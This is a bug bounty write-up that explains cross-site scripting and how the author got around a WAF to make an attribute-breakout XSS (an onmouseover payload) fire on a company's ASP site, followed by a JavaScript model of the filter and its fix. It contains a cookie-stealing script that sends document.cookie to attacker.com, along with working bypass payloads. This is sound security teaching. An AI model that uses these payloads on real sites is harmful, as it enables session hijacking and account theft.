This article was originally published at FaiyazHacks

Hi everyone, I hope you all are doing well and great! In this article we are going to talk about a weird XSS that I found in one of the most famous energy drink companies (you might have guessed it).

Contents of this article:

1- What is XSS?

2- Story of the Weird XSS.

So let’s begin our hacking journey.

WHAT IS XSS?

Have you ever heard the term "JavaScript"? If yes, good; if not, it is a programming language most commonly used on the client side (in browsers like Firefox, Chrome, etc.). You have all visited websites with very fancy looks, animations, etc. These things are possible because of JavaScript: it can control the whole web page and manipulate it as the developer chooses!

This is very good for developers, since they can add more design, functionality, etc. with ease via JavaScript. But ask yourself: what do you think will happen if someone else (an attacker) is able to write their own JavaScript code into someone else's website?

Then that user can manipulate the website without authorization and can change anything or do anything on the web page.

Well, this is how cross-site scripting works.

In general terms, CROSS-SITE SCRIPTING (XSS) is a web application vulnerability that allows an attacker to inject their own malicious code (usually JavaScript) into a web application, where it then runs in other users' browsers.

Now, by achieving XSS, the attacker can:

1- Change the content of the page.

2- Steal cookies.

3- Redirect Users.

4- Deliver malware

and so on…

Let’s see one example:

#Example:

Suppose Facebook's comment functionality is vulnerable to XSS. Now the attacker visits some famous personality's page (let's say Ronaldo) and, on his latest post, comments:

<script>document.location.href="https://attacker.com/?cookie=" + document.cookie</script>

This code will send the cookies of every person who visits Ronaldo's post to the attacker. Using those cookies, the attacker can then take full control over the victims' accounts.

In this case, everyone who sees Ronaldo's latest post becomes a victim and loses their account to the attacker. And since Ronaldo is a very famous personality, the attacker can hack at least 10 MILLION users just by using the script above!

Now I hope you understand what XSS is and why it is one of the most dangerous vulnerabilities out there.

To learn more about XSS, you can click here.

STORY OF THE ENCODED XSS

In the month of September, I started hunting on a private bug bounty program that had everything in scope. So I began my recon process and started looking for some common vulnerabilities like open redirection, CSRF, etc. In 2-3 days I found 9 vulnerabilities in the company and reported all of them. But unfortunately all of them were flagged either as Duplicate or Not Applicable.

The next day, I started testing a new web application which was running on an ASP server. I tried to find some hidden parameters using tools like FFUF and ParamSpider and found a menuid parameter. I captured the request in Burp Suite and tried injecting a normal <script>alert(1)</script> tag, but it was protected and redirected me to a NotFound.aspx page. I was about to give up, but then I thought of adding only <> as the parameter's value; the result was still the same.

Then I thought, let's URL-encode the special characters and see what happens. I encoded < to %3c and > to %3e and, to my surprise, it got rendered!!

Then I tried to inject <script>alert(1)</script> again, but it didn't work. It seems the back end was checking for some of the harmful tags to prevent XSS. After some time, I found that when I add "/" to the payload, it triggers the WAF and redirects me to the NotFound page.

On digging deeper, I found that the payload was reflected inside an attribute of a div tag, something like this:

<div menuid="reflected_data"></div>

Then I checked which values were reflected on the page and found:

"" → Reflected

<> → Reflected

/ → Blocked

<anything between tags> → Blocked

<anything → Reflected

>anything → Reflected

By analyzing the web page's behaviour, I concluded that we cannot use any tags, since they will be blocked right away. So our only target is JavaScript event handlers like onmouseover, onclick, etc.

So I crafted the payload below using the above information:

batman" onmouseover=alert(1)>

If I pass this value in the parameter, it closes the attribute's string and allows me to add an event handler, like this:

<div menuid="batman" onmouseover=alert(1)>"></div>
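The behaviour described above (the menuid value landing inside a div attribute, a filter that blocks complete tags and "/" but not quotes or lone angle brackets, and the quote-then-event-handler breakout) can be modelled in a few lines of JavaScript, the same runtime the lab at the end of this article uses. This is an added example written for this article, not the lab's index.js or the target application's code: wafAllows is my simplified stand-in for the filter the write-up reports (assumed to inspect the URL-decoded value), renderVulnerable and renderHardened are assumed templates, and attributeNames is a small quote-aware tokenizer used as the check. It shows why a tag blocklist does not stop attribute breakout and that attribute-encoding the reflected value does; the same encodeAttr fix is what the comment example in the first section lacks.

```javascript
// Added example for this article, not the lab's index.js or the target app's
// code. Assumptions: the filter inspects the URL-decoded parameter, the page
// reflects menuid into a quoted attribute, and the fix is attribute encoding.

// Stand-in for the WAF/back-end check the write-up reports.
function wafAllows(value) {
  if (value.includes('/')) return false;      // "/" -> redirect to NotFound.aspx
  if (/<[^>]*>/.test(value)) return false;    // any complete <...> tag -> blocked
  return true;                                // lone <, >, and quotes pass through
}

// Vulnerable rendering: the raw value is dropped into a quoted attribute.
function renderVulnerable(menuid) {
  return `<div menuid="${menuid}"></div>`;
}

// Fix: encode every character that can end an attribute value or a tag.
const ATTR_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeAttr(value) {
  return String(value).replace(/[&<>"']/g, (c) => ATTR_ESCAPES[c]);
}
function renderHardened(menuid) {
  return `<div menuid="${encodeAttr(menuid)}"></div>`;
}

// One request: URL-decode as the server would, apply the filter, then render.
function handleRequest(rawParam, render) {
  const decoded = decodeURIComponent(rawParam);
  if (!wafAllows(decoded)) {
    return { status: 302, location: '/NotFound.aspx', html: null };
  }
  return { status: 200, location: null, html: render(decoded) };
}

// Quote-aware tokenizer returning the attribute names of the first tag.
// The template declares only "menuid", so any other name means the reflected
// value escaped its attribute; this is the check a test suite should assert.
function attributeNames(html) {
  const names = [];
  let i = html.indexOf('<');
  if (i < 0) return names;
  i++;
  while (i < html.length && !/[\s>]/.test(html[i])) i++; // skip the tag name
  while (i < html.length) {
    while (i < html.length && /\s/.test(html[i])) i++;
    if (i >= html.length || html[i] === '>') break;
    const start = i;
    while (i < html.length && !/[\s=>]/.test(html[i])) i++;
    names.push(html.slice(start, i).toLowerCase());
    while (i < html.length && /\s/.test(html[i])) i++;
    if (html[i] === '=') {
      i++;
      while (i < html.length && /\s/.test(html[i])) i++;
      if (html[i] === '"' || html[i] === "'") {
        const quote = html[i++];
        while (i < html.length && html[i] !== quote) i++; // quoted value may hold '>'
        i++; // step past the closing quote
      } else {
        while (i < html.length && !/[\s>]/.test(html[i])) i++; // unquoted value
      }
    }
  }
  return names;
}

// Constructed probes mirroring the write-up's table, URL-encoded as sent.
const PROBES = {
  scriptTag: '%3Cscript%3Ealert(1)%3C/script%3E',   // blocked: contains "/"
  loneAngle: '%3Canything',                         // passes: no complete tag
  breakout: 'batman%22%20onmouseover%3Dalert(1)%3E', // passes the filter
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, raw] of Object.entries(PROBES)) {
    for (const render of [renderVulnerable, renderHardened]) {
      const res = handleRequest(raw, render);
      console.log(name, render.name, res.status, res.html, res.html && attributeNames(res.html));
    }
  }
}
```

Run it with node: the vulnerable renderer turns the breakout probe into a div with a second attribute, onmouseover, while the hardened renderer keeps the whole value inside the quoted menuid attribute, so attributeNames reports only "menuid". Note that the filter never changes between the two runs; only the output encoding does, which is the actual fix for this class of bug.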

And BOOM! It was reflected and I got the SCARY ALERT 1 POP-UP!


I reported this issue to the company right away and, in gratitude, they rewarded me with 1 tray of their energy drinks!!

Takeaways:

1- Never give up.

2- Analyze the web response and attack according to it.

3- Follow the road less traveled.

4- Never stop learning.

5- Try adding special characters and see the response.

That's it for this article. I hope you learnt something new from it. Let me know if you have any doubts regarding this article or XSS.

We'll meet again in the next article. Till then

DOWNLOAD HERE:

If you want to test out this scenario yourself, then follow the steps below:

1. Download the file from here.
2. Extract the files.
3. Install Node.js on your Kali Linux machine by typing sudo apt install nodejs -y
4. After installation, type node index.js in your terminal in the lab's directory.
5. Find your IP address by typing "ifconfig".
6. You can now access the lab by typing your IP address in the browser.